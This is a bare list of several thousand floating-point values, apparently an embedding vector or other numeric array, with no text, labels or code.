0.03326185792684555, -0.0026425656396895647, -0.03375015780329704, -0.0032601216807961464, -0.01717667654156685, -0.023481491953134537, -0.03297462314367294, -0.006146837025880814, -0.020982544869184494, -0.014735175296664238, 0.04440658912062645, -0.043056584894657135, 0.018655939027667046, -0.011281169950962067, -0.008107218891382217, 0.01199925784021616, 0.02800544910132885, 0.0036173705011606216, -0.0011920268880203366, 0.0017673951806500554, -0.024587348103523254, -0.01565432921051979, 0.01684635505080223, -0.021758079528808594, -0.00016437494195997715, -0.0033444969449192286, -0.0609513483941555, 0.007819983176887035, -0.02326606586575508, 0.010900583118200302, 0.020709671080112457, 0.010670794174075127, 0.015869755297899246, -0.023294789716601372, 0.02086765132844448, 0.001819456578232348, 0.008329826407134533, -0.00771945109590888, 0.017808593809604645, 0.022978831082582474, 0.005812926217913628, 0.002109384862706065, 0.051817264407873154, -0.012875325977802277, -0.0023355826269835234, -0.010498452931642532, -0.017047420144081116, -0.019302217289805412, -0.0034522102214396, -0.01920168474316597, -0.008889934979379177, 0.010728241875767708, 0.010354835540056229, 0.011755107901990414, 0.022131485864520073, -0.008128761313855648, 0.0077840788289904594, -0.0035509474109858274, 0.01766497641801834, 0.008552433922886848, 0.01595592498779297, 0.024946393445134163, -0.012638356536626816, 0.04469382390379906, 0.000373854796634987, -0.0021022038999944925, -0.0015178595203906298, 0.012904049828648567, 0.012056705541908741, 0.00045508856419473886, -0.017363378778100014, 0.024343198165297508, -0.01342107355594635, -0.0368235744535923, -0.012408568523824215, 0.01881391741335392, 0.01727720908820629, -0.00878222193568945, -0.018138915300369263, -0.004631670657545328, -0.01766497641801834, 0.024946393445134163, 0.032543767243623734, 0.0019496101886034012, 0.004847097210586071, -0.03960976004600525, 0.00024100844166241586, 0.003529404755681753, -0.06721308082342148, 0.005676489323377609, -0.018900088965892792, 0.005665718112140894, -0.02121233381330967, 0.00630122609436512, 0.02926928550004959, -0.019948497414588928, -0.0375991128385067, 0.03168206289410591, 0.05333961173892021, 0.006110932677984238, -0.01917296089231968, -0.0335778146982193, -0.010397921316325665, -0.007381949573755264, 0.011927449144423008, 0.03165334090590477, -0.02402723953127861, -0.00012117742880946025, -0.015453263185918331, 0.045871492475271225, 0.013313359580934048, -0.00998142920434475, 0.0268421471118927, 0.03492782264947891, -0.018670300021767616, -0.004900953732430935, -0.007863068953156471, -0.011992077343165874, 0.019704347476363182, -0.009744460694491863, 0.0029692957177758217, 0.011467873118817806, 0.03472675755620003, -0.0102471224963665, 0.0016704532317817211, -0.020092114806175232, -0.0018598490860313177, 0.009758821688592434, -0.015884116291999817, -0.04449276253581047, 0.01565432921051979, -0.007249102927744389, 0.017521359026432037, -0.0024720195215195417, 0.018253808841109276, 0.014124799519777298, 0.00034423364559188485, 0.02398415468633175, -0.014634642750024796, -0.019101152196526527, 0.011561224237084389, -0.0102471224963665, -0.017794232815504074, 0.0028364493045955896, 0.015769222751259804, 0.0014460505917668343, -0.009837811812758446, -0.010563081130385399, -0.007482481654733419, 0.01200643926858902, -0.02598044089972973, 0.0068074786104261875, 0.00085183244664222, -0.004455738700926304, -0.002342763589695096, -0.010807231068611145, -0.021370312198996544, -0.018311256542801857, 0.008351368829607964, -0.015367092564702034, -0.018627215176820755, -0.01720539852976799, 0.020637862384319305, -0.0038345924112945795, 0.025922993198037148, -0.029125668108463287, -0.012358302250504494, 0.029470350593328476, 0.030102267861366272, -0.025736290961503983, 0.0035042716190218925, 0.0036012136843055487, -0.009342330507934093, 0.00023382755171041936, 0.042970411479473114, 0.007098304573446512, 0.024228304624557495, -0.002908258233219385, 0.02402723953127861, -0.013040486723184586, -0.010685156099498272, -0.014706451445817947, 0.013090752996504307, -0.024170856922864914, 0.004225950688123703, 0.02036498859524727, -0.019058067351579666, -0.019704347476363182, -0.027028849348425865, 0.0018203542567789555, 0.023768728598952293, -0.012114152312278748, 0.001613006228581071, -0.0017754737054929137, 0.039408694952726364, 0.01958945393562317, -0.03949486464262009, 0.015869755297899246, 0.01299740094691515, 0.008717593736946583, -0.026957040652632713, -0.005450291559100151, 0.01043382566422224, -0.023352237418293953, -0.02283521369099617, 0.005091247148811817, -0.004789649974554777, -0.03409484028816223, 0.012279313057661057, -0.007162932306528091, 0.012932772748172283, -0.0050876569002866745, -0.01727720908820629, -0.012063886038959026, 0.01836870238184929, 0.02317989617586136, -0.026152782142162323, -0.020609138533473015, -0.0337214358150959, 0.008911477401852608, 0.012860964052379131, 0.011281169950962067, 0.01966126263141632, -0.03234270587563515, 0.003649684600532055, -0.013650861568748951, -0.009263341315090656, 0.005996038671582937, 0.006821840535849333, 0.005170236807316542, -0.011884364299476147, 0.008559614419937134, 0.008681689389050007, -0.012049524113535881, 0.015122942626476288, 0.009600842371582985, -0.017004335299134254, -0.013435435481369495, -0.026597997173666954, 0.0022224837448447943, -0.026698529720306396, -0.016989972442388535, 0.023783089593052864, 0.028680453076958656, -0.004868639633059502, -0.024644795805215836, -0.010756964795291424, 0.006624366156756878, 0.013040486723184586, 0.010232760570943356, -0.0034845243208110332, -0.0046244896948337555, -0.021901698783040047, 0.017004335299134254, 0.006197103299200535, 0.05282258614897728, -0.020494244992733, -0.020537329837679863, -0.006617185194045305, 0.007180884480476379, -0.027158105745911598, -0.0008599109132774174, -0.02638256922364235, -0.01499368716031313, -0.03119376301765442, -0.023424046114087105, -0.02369691990315914, -0.023524578660726547, 0.0034558007027953863, -0.011647394858300686, 0.006495110224932432, -0.019532006233930588, -0.0074465773068368435, 0.006333540193736553, 0.04440658912062645, -0.0042833974584937096, -0.006286864634603262, 0.03331930562853813, -0.014893154613673687, 0.021930420771241188, 0.00579497404396534, 0.007396311033517122, -0.024501178413629532, 0.00621146522462368, 0.001209081383422017, -0.008818126283586025, 0.00998142920434475, -0.04334381967782974, 0.006994181778281927, -0.0026928316801786423, 0.0017261051107198, 0.00630122609436512, -0.010347655043005943, -0.015740498900413513, -0.015137304551899433, 0.011575586162507534, -0.014893154613673687, 0.007575833238661289, -0.014562834054231644, 0.018641576170921326, 0.06451306492090225, -0.017047420144081116, -0.000936207827180624, -0.022131485864520073, 0.011905906721949577, 0.01602773368358612, -0.0021847840398550034, 0.028709176927804947, -0.045009784400463104, -0.00998142920434475, 0.019402749836444855, -0.010160951875150204, -0.0037879166193306446, 0.010541538707911968, 0.025851184502243996, -0.015797946602106094, -0.02037934958934784, -0.009809087961912155, 0.03883422538638115, -0.0060283527709543705, 0.008947381749749184, 0.00081413279986009, 0.008954563178122044, -0.02603788673877716, 0.03363526239991188, -0.013945277780294418, -0.027545873075723648, -0.021413397043943405, -0.008164665661752224, -0.00759737566113472, -0.008308283053338528, 0.014699270948767662, 0.009421320632100105, -0.003274483373388648, -0.00225838809274137, -0.007338864263147116, 0.009938344359397888, -0.005181008018553257, -0.016214437782764435, -0.0004995202762074769, -0.014641823247075081, -0.008581156842410564, -0.012738889083266258, 0.0033642444759607315, -0.0013679584953933954, -0.012717346660792828, 0.010002972558140755, -0.016688376665115356, -0.014038628898561, 0.012286493554711342, 0.00681465957313776, -0.010441006161272526, 0.013715489767491817, 0.0019155009649693966, -0.00904073379933834, 0.018253808841109276, 0.010555900633335114, -0.00479683093726635, -0.013701127842068672, -0.01260245218873024, -0.016645289957523346, 0.0037843261379748583, -0.030992697924375534, -0.019431473687291145, 0.01759316772222519, 0.001637241686694324, -0.027804385870695114, 0.0011399653740227222, 0.006620775442570448, 0.01805274374783039, 0.022648509591817856, 0.027330446988344193, -0.00149990723002702, -0.014483843930065632, 0.014368950389325619, 0.019101152196526527, 0.019847964867949486, 0.02287829853594303, -0.016286246478557587, -0.01677454635500908, 0.03515760973095894, 0.028292685747146606, 0.0031631796155124903, 0.031078867614269257, -0.011051381006836891, 0.023854898288846016, -0.021039992570877075, -0.016731461510062218, -0.0191873237490654, -0.005317444913089275, -0.011159094981849194, 0.012947134673595428, 0.019905412569642067, -0.003744831308722496, 0.018497958779335022, 0.03288844972848892, 0.019431473687291145, -0.004222359973937273, -0.014605918899178505, -0.009837811812758446, 0.00024257926270365715, -0.002333787502720952, 0.009521853178739548, -0.008301102556288242, -0.007489662617444992, 0.020551690831780434, 0.006423301063477993, 0.013492882251739502, 0.01301894336938858, -0.010275845415890217, -0.03871932998299599, -0.02757459692656994, 0.013284636661410332, -0.005496967118233442, -0.009205893613398075, 0.013643681071698666, 0.017808593809604645, -0.00822929386049509, -0.01720539852976799, -0.03510016202926636, -0.0049260868690907955, -0.049864061176776886, 0.03076290898025036, -0.001038535381667316, 0.005015847738832235, 0.0018885725876316428, 0.01607082039117813, 0.009543395601212978, 0.02682778425514698, 0.035846974700689316, 0.046273618936538696, 0.009844992309808731, 0.0029387769754976034, -0.01647294871509075, 0.019101152196526527, -0.036220382899045944, 0.0199628584086895, 0.012559367343783379, -0.022634148597717285, 0.0066315471194684505, -0.0219735074788332, 0.02516181953251362, 0.01281069777905941, 0.0034522102214396, -0.007277826312929392, 0.001109446631744504, 0.03150971978902817, 0.00901919137686491, 0.018713384866714478, 0.032170362770557404, -0.0019998764619231224, -0.03673740476369858, 0.005130742210894823, 0.031050145626068115, -0.008372911252081394, 0.0026784699875861406, 0.002644360763952136, -0.01957509107887745, 0.006049895193427801, -0.00479324022307992, 0.02119797095656395, 0.0031667700968682766, 0.023380959406495094, -0.0017611118964850903, -0.0082005700096488, 0.026181505993008614, 0.005152284633368254, -0.03808741271495819, -0.003971029072999954, -0.033836327493190765, 0.021470844745635986, 0.004531138110905886, -0.005364120937883854, 0.01720539852976799, 0.021442120894789696, -0.00315061304718256, -0.018684661015868187, 0.02964269183576107, 0.023854898288846016, -0.03441079705953598, -0.006462796125560999, 0.02677033841609955, 0.01378011703491211, -0.01641550287604332, -0.0017988116014748812, -0.026296399533748627, 0.0020627090707421303, 0.009313607588410378, -0.009708556346595287, 0.019086791202425957, -0.003087780438363552, 0.033405475318431854, -0.016314970329403877, -0.006401758641004562, 0.01278915535658598, -0.025879908353090286, -0.008796583861112595, -0.028924603015184402, 0.0020178286358714104, 0.010950849391520023, 0.01848359778523445, -0.004771697800606489, -0.009047914296388626, 0.00943568255752325, -0.008767860010266304, -0.01635805517435074, -0.015754859894514084, -0.011431967839598656, 0.015137304551899433, -0.007755355443805456, -0.007669184822589159, 0.0002147533232346177, 0.01100111473351717, -0.008214931935071945, -0.011252446100115776, 0.009916801936924458, -0.001007119077257812, -0.03716825693845749, 0.013851926662027836, 0.01001015305519104, -0.003909991588443518, 0.022605424746870995, 0.003132660873234272, 0.020724032074213028, 0.002831063698977232, 0.027100658044219017, 0.028335770592093468, -0.025793736800551414, -0.013198466040194035, 0.012674260884523392, -0.02366819605231285, -0.028565559536218643, -0.016559120267629623, 0.007511205039918423, 0.006071438081562519, 0.01605645753443241, 0.015869755297899246, -0.0057267555966973305, -0.005694441497325897, -0.007934877648949623, 0.030159715563058853, -0.015941563993692398, -0.022993192076683044, 0.0014218151336535811, 0.0013805250637233257, -0.000337277160724625, -0.006437662988901138, -0.02286393567919731, -0.009550576098263264, 0.02085328847169876, -0.021111801266670227, 0.014893154613673687, -0.0026641080621629953, 0.010548719204962254, -0.01648731157183647, 0.017478272318840027, 0.020738394930958748, -0.001797016360796988, 0.021930420771241188, 0.018210723996162415, 0.008861211128532887, -0.01219314243644476, 0.0041649132035672665, 0.003945895936340094, -0.01464900467544794, 0.031021421775221825, -0.0006076823337934911, -0.0017763712676241994, 0.011065742932260036, 0.0063299499452114105, 0.020336264744400978, -0.010491272434592247, 0.009809087961912155, -0.020178286358714104, -0.0013670609332621098, 0.024199580773711205, 0.028163429349660873, -0.018928810954093933, -0.016329331323504448, 0.0047501553781330585, -0.027904916554689407, 0.051874708384275436, -0.0015465830219909549, -0.01443357765674591, -0.0019226818112656474, -0.041792746633291245, -0.03291717544198036, -0.00641971081495285, 0.01563996635377407, -0.01124526560306549, 0.002288907067850232, 0.004685527179390192, 0.005730345845222473, -0.006182741839438677, 0.007475300692021847, 0.0035868517588824034, -0.034209735691547394, 0.016559120267629623, 0.0008890832541510463, 0.0038238209672272205, 0.006836201995611191, 0.041419342160224915, 0.03757038712501526, 0.002633589319884777, -0.014591557905077934, 0.009119722992181778, -0.005945772398263216, -0.006193513050675392, 0.006491519510746002, -0.017909126356244087, 0.01321282796561718, 0.007195246405899525, 0.009148446843028069, -0.01923040859401226, 0.006128884851932526, -0.027115020900964737, -0.0009065867052413523, -0.0037771451752632856, -0.006624366156756878, -0.003680203342810273, -0.004269035998731852, -0.013478520326316357, -0.038288477808237076, -0.021341588348150253, -0.005001486279070377, -0.010002972558140755, 0.019115515053272247, -0.0041433703154325485, -0.004434196278452873, -0.03159589320421219, 0.008818126283586025, 0.007705089170485735, 0.03650761768221855, -0.010922125540673733, -0.004929677117615938, -0.0005111892241984606, 0.03004482015967369, 0.022232018411159515, 0.0014936239458620548, 0.0017539310501888394, -0.045440636575222015, 0.021829888224601746, 0.003479138482362032, 0.017866041511297226, 0.012042343616485596, -0.00020431861048564315, -0.007819983176887035, 0.0058631920255720615, 0.004154141526669264, -0.01607082039117813, -0.0147782601416111, 0.0116402143612504, -0.007942058145999908, 0.018928810954093933, -0.005888325162231922, 0.005751888733357191, 0.011597128584980965, 0.023079363629221916, 0.032199084758758545, -0.015180390328168869, -0.010067599825561047, 0.005647765938192606, -0.010304569266736507, 0.010146589949727058, 0.0021668318659067154, -0.00530667370185256, 0.013492882251739502, 0.02082456462085247, 0.0012755045900121331, 0.0017611118964850903, -0.001011607120744884, 0.011905906721949577, 0.013679585419595242, -0.01058462355285883, -0.014218151569366455, 0.0026641080621629953, 0.015869755297899246, -0.012150056660175323, -0.007726631592959166, 0.037398047745227814, -0.002662312937900424, -0.010067599825561047, -0.006714127026498318, -0.02046552114188671, -0.01281069777905941, 0.022275103256106377, -0.005371301434934139, -0.01119499932974577, -0.016975611448287964, -0.009608023799955845, -0.010677975602447987, 0.00040145631646737456, 0.03082035668194294, 0.024285752326250076, 0.007633280474692583, 0.020092114806175232, 0.005554414354264736, 0.007669184822589159, -0.021714994683861732, -0.00040100753540173173, 0.03949486464262009, -0.007155751343816519, -0.000015049002286104951, 0.010914944112300873, 0.02116924710571766, 0.02167190983891487, -0.00741785392165184, 0.00998861063271761, 0.022591063752770424, -0.013327721506357193, 0.02365383319556713, 0.0010995729826390743, -0.010204036720097065, -0.027416616678237915, -0.044665101915597916, -0.009213075041770935, -0.0057052127085626125, 0.007949239574372768, 0.012473196722567081, -0.0037843261379748583, -0.0002531261707190424, 0.007884611375629902, -0.02961396798491478, -0.03245759755373001, 0.022892659530043602, -0.02559267170727253, -0.005845239851623774, -0.0020860470831394196, -0.008143123239278793, -0.013844745233654976, 0.0025366474874317646, -0.009608023799955845, -0.0012072862591594458, -0.0063119977712631226, 0.014577195979654789, 0.016717098653316498, -0.02086765132844448, -0.015697414055466652, -0.025951717048883438, -0.009213075041770935, 0.03647889196872711, -0.028579920530319214, -0.006082209292799234, 0.004032066557556391, -0.015740498900413513, -0.02042243629693985, -0.020566053688526154, -0.0052276840433478355, -0.007439396344125271, 0.004567042458802462, 0.023854898288846016, 0.01595592498779297, 0.0006817352259531617, 0.018742108717560768, 0.007073171436786652, -0.016616566106677055, 0.01563996635377407, 0.004778878763318062, -0.007740993518382311, 0.010886221192777157, 0.009608023799955845, -0.02636820822954178, 0.023897983133792877, 0.0066854036413133144, 0.0188713651150465, 0.01443357765674591, 0.007827164605259895, -0.0006925065536051989, 0.011202179826796055, -0.005163055844604969, 0.014921878464519978, -0.00330141163431108, 0.009105361998081207, -0.00018086853378918022, 0.015467625111341476, -0.01538145449012518, -0.02287829853594303, -0.020149562507867813, -0.003996162209659815, -0.015424540266394615, 0.017104867845773697, -0.0033427018206566572, -0.0011767675168812275, 0.005062523763626814, -0.018957534804940224, 0.008286740630865097, 0.004057199694216251, -0.001078030327335, 0.002147084567695856, -0.0018831869820132852, 0.007669184822589159, 0.0074465773068368435, 0.003540176199749112, -0.00047169436584226787, 0.02488894574344158, 0.019819241017103195, 0.016961248591542244, 0.04170657694339752, 0.006103751715272665, -0.02284957468509674, 0.00841599702835083, -0.006308407057076693, 0.005209731869399548, 0.0023194258101284504, 0.015869755297899246, -0.002689241198822856, -0.017478272318840027, 0.015079857781529427, 0.005058933049440384, -0.0063299499452114105, -0.006426891777664423, -0.010318931192159653, -0.013241550885140896, -0.008789402432739735, 0.0024594529531896114, 0.0022045315708965063, -0.011525319889187813, -0.006775164511054754, -0.024213943630456924, 0.005805745255202055, 0.007349635474383831, 0.01063488982617855, 0.005540052428841591, -0.022217657417058945, 0.007177294231951237, 0.004132599104195833, 0.007432215381413698, 0.006961867678910494, -0.0074106729589402676, -0.007791259791702032, -0.0018688251730054617, 0.00379868783056736, -0.010936487466096878, -0.014684909023344517, -0.0016569891013205051, 0.012846602126955986, 0.014124799519777298, -0.017880402505397797, -0.004190046340227127, -0.009083818644285202, 0.006430482026189566, -0.005654946435242891, -0.002109384862706065, 0.01848359778523445, 0.014512567780911922, 0.004789649974554777, -0.0023499445524066687, -0.003143432317301631, -0.014534110203385353, -0.00003697033389471471, -0.0023373779840767384, -0.007184475194662809, -0.004599356558173895, -0.01559688150882721, -0.0005372199229896069, -0.0014586171600967646, 0.012652718462049961, 0.0011202179593965411, -0.0021901698783040047, 0.014060172252357006, -0.002981862286105752, 0.00005941059862379916, 0.03171078488230705, 0.0024127771612256765, 0.011151913553476334, 0.01300458237528801, -0.015754859894514084, 0.011733565479516983, 0.0012063885806128383, -0.011654575355350971, 0.003197288839146495, -0.0017620095750316978, -0.006179151125252247, -0.0012961496831849217, -0.004082332830876112, -0.0030267429538071156, 0.014498205855488777, -0.01726284623146057, 0.004082332830876112, 0.009091000072658062, 0.005891915876418352, 0.015754859894514084, -0.01142478734254837, -0.0071162567473948, -0.006832611747086048, -0.019445834681391716, 0.020566053688526154, -0.013988363556563854, -0.012035162188112736, 0.004681936930865049, 0.020092114806175232, 0.03593314811587334, -0.017880402505397797, 0.0020806612446904182, -0.02764640562236309, -0.027517149224877357, -0.021140525117516518, -0.027847470715641975, -0.00018917143461294472, -0.007662003859877586, -0.006146837025880814, 0.013334902934730053, 0.003349882550537586, -0.0012638357002288103, -0.012954316101968288, -0.000729757419321686, 0.02770385332405567, -0.0026766746304929256, -0.031366102397441864, -0.00977318361401558, 0.0343533530831337, -0.008861211128532887, -0.002531261881813407, 0.003567104460671544, -0.006954686716198921, -0.01684635505080223, 0.0067895264364778996, -0.021140525117516518, -0.019043706357479095, -0.03326185792684555, 0.02076711878180504, 0.014333046041429043, -0.008854030631482601, 0.023122448474168777, 0.006742850411683321, 0.01796657405793667, 0.020925097167491913, -0.027718214318156242, 0.013823202811181545, -0.008186208084225655, 0.019058067351579666, 0.011360159143805504, 0.02164318598806858, 0.0012261359952390194, 0.00841599702835083, 0.03613420948386192, 0.0041469610296189785, -0.01480698399245739, 0.014964963309466839, -0.0007149468292482197, -0.00799950584769249, 0.003294230904430151, -0.031825680285692215, -0.0044665103778243065, -0.013191284611821175, 0.0070013622753322124, 0.02998737432062626, 0.004491643514484167, -0.011948991566896439, 0.019402749836444855, -0.0019208865705877542, 0.018497958779335022, 0.002520490437746048, 0.011948991566896439, -0.0052635883912444115, -0.0014451530296355486, 0.011273988522589207, -0.012853783555328846, 0.00020600162679329515, -0.01602773368358612, 0.02475968934595585, 0.0017135385423898697, -0.014275598339736462, 0.015539433807134628, -0.00019758653070311993, 0.004940448794513941, -0.015611243434250355, 0.015166028402745724, 0.013255912810564041, 0.009098180569708347, -0.011044200509786606, 0.013456977903842926, -0.03245759755373001, 0.021312864497303963, -0.002919029677286744, -0.004373158793896437, 0.021858612075448036, -0.005270769353955984, -0.0024002105928957462, -0.00711266603320837, 0.018311256542801857, -0.0023032687604427338, -0.0002941918792203069, 0.0051199705339968204, 0.009234617464244366, -0.0284650269895792, 0.014964963309466839, -0.0016121085500344634, 0.009629566222429276, 0.016530396416783333, 0.01538145449012518, -0.016099542379379272, 0.009557757526636124, 0.0014343817019835114, 0.01676018536090851, -0.02967141568660736, -0.016501672565937042, 0.016099542379379272, -0.0031218896619975567, 0.0017691904213279486, -0.0006072335527278483, -0.009363873861730099, 0.02486022189259529, 0.017018696293234825, -0.008983287028968334, 0.010541538707911968, 0.009744460694491863, -0.005378482397645712, 0.019101152196526527, -0.0013706512982025743, 0.020336264744400978, -0.024544263258576393, 0.010498452931642532, -0.006911601405590773, -0.0016704532317817211, 0.02042243629693985, 0.005780612118542194, -0.001958586275577545, 0.012200322933495045, -0.007432215381413698, 0.005730345845222473, 0.012509101070463657, 0.01680327020585537, -0.015912840142846107, -0.006250959821045399, -0.0034450292587280273, -0.009543395601212978, -0.022131485864520073, -0.02722991444170475, -0.009162808768451214, 0.004839916247874498, 0.03558846563100815, 0.014124799519777298, -0.011769469827413559, -0.00001918642556120176, -0.009442863054573536, 0.0033373162150382996, -0.02718682959675789, -0.01459873840212822, -0.0013096138136461377, 0.028263961896300316, 0.012221865355968475, 0.010907763615250587, -0.005715983919799328, -0.0017988116014748812, 0.0066315471194684505, -0.022260742262005806, 0.029901202768087387, -0.017506996169686317, 0.021542653441429138, -0.005784202367067337, 0.00940695870667696, -0.007073171436786652, -0.000027461273930384777, 0.005737526807934046, -0.008839668706059456, -0.0019316578982397914, 0.013119475916028023, -0.006107342429459095, -0.022260742262005806, -0.013873469084501266, 0.024228304624557495, 0.028192153200507164, 0.022634148597717285, -0.007080352399498224, 0.006258140783756971, 0.010232760570943356, -0.013902192935347557, -0.01599901169538498, -0.017435187473893166, -0.003200879320502281, 0.0012764022685587406, 0.02440064586699009, 0.001091494457796216, -0.008645785041153431, -0.01957509107887745, 0.027043212205171585, -0.016961248591542244, 0.00044386842637322843, -0.0072850072756409645, -0.00940695870667696, 0.005651356186717749, -0.004233131650835276, 0.0015672281151637435, 0.027517149224877357, 0.008143123239278793, 0.002387644024565816, 0.015324007719755173, 0.005249226465821266, -0.013492882251739502, 0.009550576098263264, -0.0010986753040924668, -0.011137551628053188, 0.003620960982516408, -0.014189427718520164, -0.0005578649579547346, -0.015022410079836845, -0.005270769353955984, 0.013119475916028023, -0.02204531617462635, 0.008710413239896297, -0.029815033078193665, 0.001129194046370685, 0.010340473614633083, 0.00769072724506259, 0.0069690486416220665, 0.009902440011501312, 0.01179819367825985, 0.012430110946297646, -0.0003110220714006573, -0.017837317660450935, 0.011352978646755219, -0.039868272840976715, -0.007101894821971655, -0.0002356227778363973, -0.016674013808369637, -0.018497958779335022, -0.0004120032535865903, 0.030159715563058853, -0.0188713651150465, -0.0014945216244086623, -0.0032206266187131405, -0.010340473614633083, -0.01795221120119095, 0.006610004231333733, -0.011173455975949764, 0.006049895193427801, -0.010670794174075127, -0.01341389212757349, -0.0026946270372718573, -0.014282779768109322, -0.0018383064307272434, -0.009873716160655022, -0.0055831377394497395, -0.004531138110905886, -0.027474064379930496, 0.0007059707422740757, -0.011855640448629856, -0.02238999865949154, 0.018900088965892792, -0.011159094981849194, -0.0004095348122064024, 0.006322768982499838, -0.0014756717719137669, 0.0009236412588506937, -0.01648731157183647, 0.020724032074213028, 0.0016076205065473914, -0.0015295284101739526, -0.01727720908820629, -0.001481955056078732, 0.0023948249872773886, -0.017320293933153152, 0.0028167020063847303, 0.02727299928665161, -0.003556333016604185, 0.008588338270783424, -0.009047914296388626, -0.012738889083266258, -0.010297388769686222, 0.01439049281179905, 0.026296399533748627, 0.004136189352720976, -0.033032070845365524, -0.0004272626247256994, -0.012904049828648567, -0.018727747723460197, 0.014146342873573303, -0.02086765132844448, -0.004222359973937273, -0.0040212953463196754, -0.011776650324463844, -0.00998861063271761, 0.023869261145591736, -0.014333046041429043, 0.0044988240115344524, -0.00260845641605556, -0.002748483559116721, -0.0196468997746706, 0.031883127987384796, 0.007048038300126791, 0.005823697429150343, -0.017004335299134254, -0.005870372988283634, 0.014663366600871086, -0.008961743675172329, -0.005152284633368254, 0.030734185129404068, -0.010182494297623634, -0.018225084990262985, -0.01464900467544794, 0.0017763712676241994, 0.001233316957950592, 0.024673519656062126, 0.021758079528808594, -0.0010717470431700349, -0.005787793081253767, 0.009572119452059269, 0.008674508891999722, 0.004078742582350969, 0.00013071454304736108, 0.0021506748162209988, 0.0017341836355626583, 0.022634148597717285, 0.010132228024303913, 0.002362511120736599, -0.0010600780369713902, -0.01607082039117813, -0.014196609146893024, 0.007970781996846199, -0.00943568255752325, 0.012932772748172283, 0.0017009720904752612, 0.020968183875083923, 0.004847097210586071, 0.0010744398459792137, -0.02444373071193695, -0.026267675682902336, -0.010742602869868279, 0.020896373316645622, 0.018253808841109276, -0.0018526682397350669, 0.020680947229266167, -0.016946887597441673, 0.002123746555298567, 0.009485948830842972, 0.006412529852241278, -0.009335150010883808, -0.012796335853636265, -0.004628079943358898, -0.014792622067034245, 0.00458499463275075, 0.020494244992733, 0.016674013808369637, -0.03771400451660156, -0.0030931660439819098, 0.003942305687814951, -0.00036420547985471785, -0.014139161445200443, -0.005669308360666037, -0.012674260884523392, -0.007633280474692583, -0.005274359602481127, -0.007970781996846199, -0.02323734201490879, -0.030533121898770332, -0.0017853474710136652, -0.0002130703069269657, 0.010929306037724018, -0.0030823945999145508, 0.024716604501008987, 0.010067599825561047, -0.018225084990262985, -0.012063886038959026, -0.02157137729227543, 0.00043938038288615644, -0.0029387769754976034, -0.011956172995269299, 0.012868145480751991, -0.03257249295711517, -0.017751146107912064, 0.000004992959020455601, 0.012595271691679955, 0.00036308346898294985, -0.016659652814269066, -0.018914449959993362, -0.04480871930718422, -0.01339234970510006, -0.004434196278452873, 0.010907763615250587, 0.005313854664564133, -0.0003278522635810077, -0.006297635845839977, 0.01239420659840107, -0.011870002374053001, -0.003547356929630041, -0.0018957535503432155, -0.023352237418293953, -0.013277455233037472, -0.018268169835209846, -0.01875646971166134, 0.010993934236466885, -0.041419342160224915, -0.015309645794332027, -0.012020801194012165, -0.008494986221194267, 0.005496967118233442, 0.008071314543485641, 0.024702243506908417, -0.01848359778523445, -0.006570509169250727, -0.010958029888570309, 0.017535720020532608, -0.013658042065799236, 0.00590986805036664, 0.000176380475750193, 0.0008468955638818443, -0.0035635139793157578, 0.01763625256717205, -0.008293922059237957, 0.003611984895542264, -0.03406611457467079, -0.009751641191542149, 0.00530667370185256, -0.00759737566113472, 0.02088201232254505, 0.0010861087357625365, 0.030590567737817764, -0.002689241198822856, 0.004057199694216251, 0.008473443798720837, 0.012315217405557632, -0.011927449144423008, -0.006437662988901138, 0.01755008101463318, -0.004667575005441904, -0.005335397087037563, -0.0021991459652781487, -0.0188713651150465, -0.0014361769426614046, 0.0009721122332848608, -0.007934877648949623, -0.005960134323686361, -0.033060792833566666, -0.01441203523427248, -0.005960134323686361, 0.011022658087313175, -0.01499368716031313, 0.0003289742744527757, 0.021456483751535416, 0.0249033086001873, -0.0026874460745602846, 0.0009191532153636217, 0.007906153798103333, 0.012171599082648754, -0.014153523370623589, -0.0009047914645634592, 0.029010774567723274, 0.0098234498873353, 0.02799108810722828, 0.007234741002321243, 0.00489018252119422, -0.017133589833974838, 0.02205967716872692, -0.012171599082648754, 0.01043382566422224, -0.004046428482979536, 0.01140324492007494, 0.006735669914633036, -0.0020716851577162743, -0.004053609445691109, 0.029958650469779968, -0.02282085083425045, -0.006868516094982624, 0.0019334531389176846, 0.0017027672147378325, 0.02967141568660736, -0.005978086497634649, 0.00530667370185256, -0.0008123375591821969, -0.018296893686056137, -0.013952458277344704, 0.007396311033517122, 0.0026389751583337784, 0.009766003116965294, 0.004893772769719362, -0.014735175296664238, -0.004190046340227127, -0.020580414682626724, 0.025865545496344566, 0.011618671007454395, 0.009205893613398075, 0.0021811937913298607, -0.006279683671891689, 0.010462548583745956, -0.010132228024303913, -0.003292435547336936, -0.013722670264542103, 0.006268912460654974, -0.010606166906654835, -0.01638677902519703, -0.0012593476567417383, 0.016171352937817574, 0.006437662988901138, 0.016674013808369637, 0.005435929633677006, 0.010419463738799095, -0.000468103913590312, 0.02317989617586136, 0.015008049085736275, -0.013751394115388393, -0.004344434943050146, -0.000286113383481279, -0.007662003859877586, 0.003866906277835369, -0.01360059529542923, 0.003489909926429391, 0.015309645794332027, -0.011123190633952618, -0.022892659530043602, 0.007532747928053141, 0.003170360578224063, 0.015683051198720932, 0.0027233504224568605, -0.01181973610073328, 0.005586727987974882, -0.0034827289637178183, 0.021442120894789696, 0.008265198208391666, -0.00838727317750454, -0.00630122609436512, -0.00017144362209364772, 0.004854278173297644, -0.008681689389050007, -0.01595592498779297, -0.012688622809946537, 0.004527547862380743, -0.029082583263516426, 0.018541043624281883, -0.028752261772751808, -0.005575956776738167, -0.022332550957798958, 0.014110438525676727, -0.0020734805148094893, 0.012135694734752178, -0.016300607472658157, 0.011539681814610958, -0.00881094578653574, 0.01839742623269558, -0.030992697924375534, 0.011805374175310135, -0.008064133115112782, -0.02728736214339733, 0.018210723996162415, 0.01879955641925335, 0.004488052800297737, 0.013988363556563854, 0.00020431861048564315, -0.006071438081562519, -0.0005156772676855326, -0.02325170487165451, -0.017909126356244087, 0.011467873118817806, -0.005486195906996727, 0.0030608519446104765, 0.022188933566212654, -0.006139656528830528, -0.012623995542526245, -0.008875573053956032, -0.000373854796634987, -0.010828773491084576, 0.024501178413629532, -0.011410425417125225, 0.002762845251709223, 0.0028633777983486652, 0.0037053364794701338, -0.02203095331788063, 0.0013078185729682446, 0.013851926662027836, -0.005195369943976402, 0.018612852320075035, -0.008918658830225468, -0.008904296904802322, 0.0026659034192562103, 0.009162808768451214, -0.016573481261730194, -0.005073294974863529, 0.021399036049842834, -0.0025240809191018343, -0.000018541268218541518, -0.02046552114188671, -0.005281540565192699, -0.013370807282626629, 0.028134705498814583, 0.028307046741247177, 0.026569273322820663, 